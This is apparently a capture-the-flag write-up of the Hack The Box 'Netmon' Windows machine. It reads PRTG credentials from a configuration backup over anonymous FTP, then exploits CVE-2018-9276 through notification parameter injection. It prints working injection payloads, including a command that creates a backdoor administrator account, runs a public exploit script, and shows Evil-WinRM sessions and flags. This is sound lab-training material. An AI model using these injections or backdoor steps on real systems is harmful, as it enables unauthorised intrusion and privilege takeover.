Netmon
Netmon is one of the most instructive machines in the Easy tier because it demonstrates something that pure exploit-focused machines don't - sensitive data exposure through misconfigured services is often more dangerous than unpatched software. The entire initial foothold comes from reading configuration backup files over anonymous FTP - no exploit required. The credential recovered from that backup then unlocks a network monitoring platform with authenticated RCE (CVE-2018-9276), which is abused to create a backdoor admin account and achieve SYSTEM-level access via WinRM. It's a realistic credential theft --> platform abuse chain that mirrors real-world incidents. What makes Netmon especially interesting is that you have two completely separate paths to root - a manual exploitation path through the PRTG notification system, and an automated path via a public exploit script. Both are documented here.
Netmon
| Machine | Netmon |
|---|---|
| Difficulty | Easy |
| OS | Windows |
| Released on | 2nd March, 2019 |
| Created by | mrb3n8132 |
Attack Chain
1
2
3
4
5
6
7
8
9
10
11
12
Nmap → FTP (anonymous, C:\ root) + HTTP (PRTG 18.1.37.13946) + WinRM (5985)
→ FTP: navigate to ProgramData\Paessler\PRTG Network Monitor\
→ Download PRTG Configuration.old.bak (Jul 2018)
→ Extract plaintext creds: prtgadmin:PrTg@dmin2018
→ Login fails → timestamp analysis → year increment
→ prtgadmin:PrTg@dmin2019 → PRTG admin access
→ CVE-2018-9276: Notification parameter injection
→ Pipe injection → SYSTEM-level command execution
→ net user htb / pentest → localgroup administrators
→ nxc confirms Pwn3d! → Evil-WinRM session
→ whoami → BUILTIN\Administrators (High IL)
→ root.txt (Administrator\Desktop)
Reconnaissance
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
Nmap scan report for 10.129.230.176
Host is up, received echo-reply ttl 127 (0.15s latency).
Scanned at 2026-06-11 22:50:38 EAT for 1044s
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19 12:18AM 1024 .rnd
| 02-25-19 10:15PM <DIR> inetpub
| 07-16-16 09:18AM <DIR> PerfLogs
| 02-25-19 10:56PM <DIR> Program Files
| 02-03-19 12:28AM <DIR> Program Files (x86)
| 02-03-19 08:08AM <DIR> Users
|_11-10-23 10:20AM <DIR> Windows
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http syn-ack ttl 127 Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-favicon: Unknown favicon MD5: 36B3EF286FA4BEFBB797A0966B456479
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 13307/tcp): CLEAN (Couldn't connect)
| Check 2 (port 41646/tcp): CLEAN (Couldn't connect)
| Check 3 (port 17884/udp): CLEAN (Failed to receive data)
| Check 4 (port 53350/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2026-06-11T20:07:52
|_ start_date: 2026-06-11T19:46:29
The scan shows two high-value findings.
- First, anonymous FTP is enabled - and the directory listing reveals the entire
C:\drive. The FTP root is mapped to the filesystem root, meaning you can browseUsers,Windows,Program Files, andinetpubwithout any credentials. - Second, port 80 is running PRTG Network Monitor version 18.1.37.13946 - a network management platform by Paessler. The version number is advertised in both the HTTP server header and the page title.
Grab the user flag from the C:\Users\Public\Desktop\user.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
➜ ftp 10.129.18.14 21
Connected to 10.129.18.14.
220 Microsoft FTP Service
Name (10.129.18.14:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls -la
229 Entering Extended Passive Mode (|||49745|)
125 Data connection already open; Transfer starting.
11-20-16 10:46PM <DIR> $RECYCLE.BIN
02-03-19 12:18AM 1024 .rnd
11-20-16 09:59PM 389408 bootmgr
07-16-16 09:10AM 1 BOOTNXT
02-03-19 08:05AM <DIR> Documents and Settings
02-25-19 10:15PM <DIR> inetpub
06-13-26 11:23AM 738197504 pagefile.sys
07-16-16 09:18AM <DIR> PerfLogs
02-25-19 10:56PM <DIR> Program Files
02-03-19 12:28AM <DIR> Program Files (x86)
12-15-21 10:40AM <DIR> ProgramData
02-03-19 08:05AM <DIR> Recovery
02-03-19 08:04AM <DIR> System Volume Information
02-03-19 08:08AM <DIR> Users
11-10-23 10:20AM <DIR> Windows
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49752|)
150 Opening ASCII mode data connection.
02-25-19 11:44PM <DIR> Administrator
01-15-24 11:03AM <DIR> Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> cd Desktop
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49758|)
125 Data connection already open; Transfer starting.
02-03-19 12:18AM 1195 PRTG Enterprise Console.lnk
02-03-19 12:18AM 1160 PRTG Network Monitor.lnk
06-13-26 11:24AM 34 user.txt
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||49761|)
150 Opening ASCII mode data connection.
100% |**************************************************************************************************************************| 34 0.19 KiB/s 00:00 ETA
226 Transfer complete.
34 bytes received in 00:00 (0.18 KiB/s)
ftp>
Credential Discovery - PRTG Configuration Backup via FTP
PRTG stores its entire configuration (sensors, devices, users, credentials, everything) in XML files under ProgramData\Paessler\PRTG Network Monitor\. Since the FTP root is C:\, you can navigate directly there:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
➜ ftp 10.129.230.176 21
Connected to 10.129.230.176.
220 Microsoft FTP Service
Name (10.129.230.176:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls -la
229 Entering Extended Passive Mode (|||49910|)
150 Opening ASCII mode data connection.
11-20-16 10:46PM <DIR> $RECYCLE.BIN
02-03-19 12:18AM 1024 .rnd
11-20-16 09:59PM 389408 bootmgr
07-16-16 09:10AM 1 BOOTNXT
02-03-19 08:05AM <DIR> Documents and Settings
02-25-19 10:15PM <DIR> inetpub
06-11-26 03:46PM 738197504 pagefile.sys
07-16-16 09:18AM <DIR> PerfLogs
02-25-19 10:56PM <DIR> Program Files
02-03-19 12:28AM <DIR> Program Files (x86)
12-15-21 10:40AM <DIR> ProgramData
02-03-19 08:05AM <DIR> Recovery
02-03-19 08:04AM <DIR> System Volume Information
02-03-19 08:08AM <DIR> Users
11-10-23 10:20AM <DIR> Windows
226 Transfer complete.
ftp> cd ProgramData
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49911|)
150 Opening ASCII mode data connection.
12-15-21 10:40AM <DIR> Corefig
02-03-19 12:15AM <DIR> Licenses
11-20-16 10:36PM <DIR> Microsoft
02-03-19 12:18AM <DIR> Paessler
02-03-19 08:05AM <DIR> regid.1991-06.com.microsoft
07-16-16 09:18AM <DIR> SoftwareDistribution
02-03-19 12:15AM <DIR> TEMP
11-20-16 10:19PM <DIR> USOPrivate
11-20-16 10:19PM <DIR> USOShared
02-25-19 10:56PM <DIR> VMware
226 Transfer complete.
ftp> cd Paessler
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49917|)
125 Data connection already open; Transfer starting.
06-11-26 03:57PM <DIR> PRTG Network Monitor
226 Transfer complete.
ftp> cd PRTG\ Network\ Monitor
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49989|)
125 Data connection already open; Transfer starting.
06-11-26 03:57PM <DIR> Configuration Auto-Backups
06-11-26 03:57PM <DIR> Log Database
02-03-19 12:18AM <DIR> Logs (Debug)
02-03-19 12:18AM <DIR> Logs (Sensors)
02-03-19 12:18AM <DIR> Logs (System)
06-11-26 03:57PM <DIR> Logs (Web Server)
06-11-26 03:57PM <DIR> Monitoring Database
02-25-19 10:54PM 1189697 PRTG Configuration.dat
02-25-19 10:54PM 1189697 PRTG Configuration.old
07-14-18 03:13AM 1153755 PRTG Configuration.old.bak
06-11-26 03:57PM 1641470 PRTG Graph Data Cache.dat
02-25-19 11:00PM <DIR> Report PDFs
02-03-19 12:18AM <DIR> System Information Database
02-03-19 12:40AM <DIR> Ticket Database
02-03-19 12:18AM <DIR> ToDo Database
226 Transfer complete.
The directory listing reveals three critical files: PRTG Configuration.dat , PRTG Configuration.old & PRTG Configuration.old.bak
The timestamps here are significant. The two .dat and .old files are both from February 2019 (the current configuration). The .old.bak file is from July 2018, a full seven months earlier.
Backup files are valuable in penetration testing as they often contain credentials that were valid at backup time and may have been reused, slightly modified, or simply forgotten about. 😉
Download the backup:
1
2
3
4
5
6
7
8
9
10
11
ftp> get PRTG\ Configuration.old.bak
local: PRTG Configuration.old.bak remote: PRTG Configuration.old.bak
229 Entering Extended Passive Mode (|||50034|)
125 Data connection already open; Transfer starting.
100% |********************************************************************************************************************************************| 1126 KiB 261.
226 Transfer complete.
1153755 bytes received in 00:04 (261.00 KiB/s)
ftp> exit
221 Goodbye.
➜ file PRTG\ Configuration.old.bak
PRTG Configuration.old.bak: XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (749)
The file is an XML document. Search it for credentials:
1
2
3
4
5
6
7
8
➜ cat PRTG\ Configuration.old.bak | grep -A3 "dbpassword"
<dbpassword>
<!-- User: prtgadmin -->
PrTg@dmin2018
</dbpassword>
<dbtimeout>
60
</dbtimeout>
You get the administrator username/password stored in plaintext in the backup XML.
This is a common PRTG behaviour: the configuration file stores credentials unencrypted for use by the monitoring engine.
The Password Mutation - A Critical Thinking Moment
Navigating to http://10.129.230.176 confirms a PRTG login page. Trying the universal default credentials (prtgadmin:prtgadmin) fails immediately.
I tried prtgadmin:PrTg@dmin2018 retrieved but it fails. The reason is visible in the file timestamps if you pay attention: the backup is from 2018, but the current config files are from 2019. Someone rotated the password at the start of the new year.
Trying prtgadmin:PrTg@dmin2019 , it worked successfully.
Foothold - PRTG Command Injection (CVE-2018-9276)
Now authenticated to PRTG as administrator, the next step is leveraging the platform for code execution. PRTG version 18.1.37.13946 has a well-documented authenticated RCE vulnerability - CVE-2018-9276 , where the Execute Program notification action fails to sanitize parameters passed to PowerShell scripts. The parameter field accepts a pipe character followed by arbitrary commands, which are executed in the context of the PRTG service account - which runs as SYSTEM.
Path 1 - Manual Exploitation
This path is worth understanding because it shows exactly what the vulnerability is doing mechanically.
Navigate to Setup –> Account Settings –> Notifications and create a new notification:
- Click Add new notification, name it
Ping
- Scroll to Execute Program, enable it
- Set Program File to
Demo exe notification - outfile.ps1 - In the Parameter field, enter the command injection payload:
1
Test | ping -n 4 10.10.15.192
Save the notification. Before triggering it, set up a tcpdump listener to confirm execution:
1
2
3
➜ sudo tcpdump -i tun0 ip proto \\icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
Click the notification’s bell icon to trigger it immediately.
The tcpdump output confirms ICMP echo requests arriving from the target (the PRTG service executed your injected command as SYSTEM). Code execution confirmed.
1
2
3
4
5
6
7
8
9
10
11
➜ sudo tcpdump -i tun0 ip proto \\icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
18:50:44.592941 IP 10.129.18.14 > 10.10.15.192: ICMP echo request, id 1, seq 772, length 40
18:50:44.596653 IP 10.10.15.192 > 10.129.18.14: ICMP echo reply, id 1, seq 772, length 40
18:50:45.605729 IP 10.129.18.14 > 10.10.15.192: ICMP echo request, id 1, seq 773, length 40
18:50:45.605770 IP 10.10.15.192 > 10.129.18.14: ICMP echo reply, id 1, seq 773, length 40
18:50:46.621647 IP 10.129.18.14 > 10.10.15.192: ICMP echo request, id 1, seq 774, length 40
18:50:46.621706 IP 10.10.15.192 > 10.129.18.14: ICMP echo reply, id 1, seq 774, length 40
18:50:47.637829 IP 10.129.18.14 > 10.10.15.192: ICMP echo request, id 1, seq 775, length 40
18:50:47.637856 IP 10.10.15.192 > 10.129.18.14: ICMP echo reply, id 1, seq 775, length 40
Now swap the ping for something useful. In my case, I opted to creating a backdoor admin account:
1
test.txt | net user htb abc123! /add ; net localgroup administrators htb /add
Save and trigger again. Verify the account was created:
1
2
3
4
5
6
➜ nxc smb 10.129.18.14 -u 'htb' -p 'abc123!'
SMB 10.129.18.14 445 NETMON [*] Windows Server 2016 Standard 14393 x64 (name:NETMON) (domain:netmon) (signing:False) (SMBv1:True)
SMB 10.129.18.14 445 NETMON [+] netmon\htb:abc123! (Pwn3d!)
➜ nxc winrm 10.129.18.14 -u 'htb' -p 'abc123!'
WINRM 10.129.18.14 5985 NETMON [*] Windows 10 / Server 2016 Build 14393 (name:NETMON) (domain:netmon)
WINRM 10.129.18.14 5985 NETMON [+] netmon\htb:abc123! (Pwn3d!)
Connect with Evil-WinRM:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
➜ evil-winrm -i 10.129.18.14 -u 'htb' -p 'abc123!'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\htb\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
========== ==============================================
netmon\htb S-1-5-21-2105491204-2789866987-2357151585-1015
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================================= ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
*Evil-WinRM* PS C:\Users\htb\Documents> type ..\..\Administrator\Desktop\root.txt
5c65846bb9da09af1a91a1648e70a1d4
whoami /all confirms BUILTIN\Administrators membership with a full administrator token - SeDebugPrivilege, SeImpersonatePrivilege, SeTakeOwnershipPrivilege, and the full set of high mandatory level privileges.
Path 2 - Automated Exploit (CVE-2018-9276)
The same vulnerability has a public exploit script on Exploit-DB:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
➜ searchsploit PRTG
--------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------- ---------------------------------
PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution | windows/webapps/46527.sh
PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS | windows/webapps/49156.txt
PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service) | windows_x86/dos/44500.py
PRTG Traffic Grapher 6.2.1 - 'url' Cross-Site Scripting | java/webapps/34108.txt
--------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
➜ searchsploit -m 46527.sh
Exploit: PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution
URL: https://www.exploit-db.com/exploits/46527
Path: /usr/share/exploitdb/exploits/windows/webapps/46527.sh
Codes: CVE-2018-9276
Verified: False
File Type: Bourne-Again shell script, ASCII text executable, with very long lines (2429)
Copied to: /home/kali/Desktop/Machine/HTB/Netmon/46527.sh
The script automates the entire notification injection chain - it logs in, creates a notification with an injected payload, triggers it three times (create user, set password, add to admins), then reports success:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
➜ bash 46527.sh -u http://10.129.230.176 -c "_ga=GA1.4.452263986.1781207512; _gid=GA1.4.1228910563.1781207512; OCTOPUS1813713946=e0NFQzJFQzZBLUE5MDItNDM0My05OTZELUU2NjI5MjU5MzI4Mn0%3D; _gat=1"
[+]#########################################################################[+]
[*] Authenticated PRTG network Monitor remote code execution [*]
[+]#########################################################################[+]
[*] Date: 11/03/2019 [*]
[+]#########################################################################[+]
[*] Author: https://github.com/M4LV0 lorn3m4lvo@protonmail.com [*]
[+]#########################################################################[+]
[*] Vendor Homepage: https://www.paessler.com/prtg [*]
[*] Version: 18.2.38 [*]
[*] CVE: CVE-2018-9276 [*]
[*] Reference: https://www.codewatch.org/blog/?p=453 [*]
[+]#########################################################################[+]
# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!'
[+]#########################################################################[+]
[*] file created
[*] sending notification wait....
[*] adding a new user 'pentest' with password 'P3nT3st'
[*] sending notification wait....
[*] adding a user pentest to the administrators group
[*] sending notification wait....
[*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun!
Verify and connect:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
➜ nxc smb 10.129.230.176 -u 'pentest' -p 'P3nT3st!' --shares ADMIN$
SMB 10.129.230.176 445 NETMON [*] Windows Server 2016 Standard 14393 x64 (name:NETMON) (domain:netmon) (signing:False) (SMBv1:True)
SMB 10.129.230.176 445 NETMON [+] netmon\pentest:P3nT3st! (Pwn3d!)
SMB 10.129.230.176 445 NETMON [*] Enumerated shares
SMB 10.129.230.176 445 NETMON Share Permissions Remark
SMB 10.129.230.176 445 NETMON ----- ----------- ------
➜ nxc winrm 10.129.230.176 -u 'pentest' -p 'P3nT3st!'
WINRM 10.129.230.176 5985 NETMON [*] Windows 10 / Server 2016 Build 14393 (name:NETMON) (domain:netmon)
WINRM 10.129.230.176 5985 NETMON [+] netmon\pentest:P3nT3st! (Pwn3d!)
➜ evil-winrm -i 10.129.230.176 -u 'pentest' -p 'P3nT3st!'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\pentest\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============== ==============================================
netmon\pentest S-1-5-21-2105491204-2789866987-2357151585-1000
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================================= ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
*Evil-WinRM* PS C:\Users\pentest\Documents> cd ..\..\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/11/2026 3:47 PM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> more root.txt
d88bf88fef93a6b8a426066c1b794bba
This post is licensed under CC BY 4.0 by the author.